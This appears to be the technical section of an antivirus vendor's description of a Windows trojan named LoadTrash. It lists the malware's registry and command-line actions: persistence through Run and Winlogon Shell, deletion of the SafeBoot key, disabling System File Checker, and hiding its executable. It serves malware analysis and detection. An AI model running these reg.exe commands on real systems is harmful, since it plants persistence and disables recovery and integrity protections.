Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'Explorer LoadTrash.EXE'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Loader...' = '<SYSTEM32>\LoadTrash.EXE'
- расширений файлов
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Loader..." /T REG_SZ /D "<SYSTEM32>\LoadTrash.EXE" /F
- <SYSTEM32>\reg.exe ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /V "HideFileExt" /T REG_DWORD /D 00000000 /F
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "Explorer LoadTrash.EXE" /F
- <SYSTEM32>\reg.exe DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot" /F
- <SYSTEM32>\attrib.exe +R +A +S +H "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\LoadTrash.EXE"
- <SYSTEM32>\label.exe /MP C: PC!
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\LoadTrash.BAT" "
- <SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "SFCDisable" /T REG_DWORD /D "ffffff9d" /F
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "SFCSetting" /T REG_DWORD /D "ffffff9d" /F
- %TEMP%\1.tmp\LoadTrash.BAT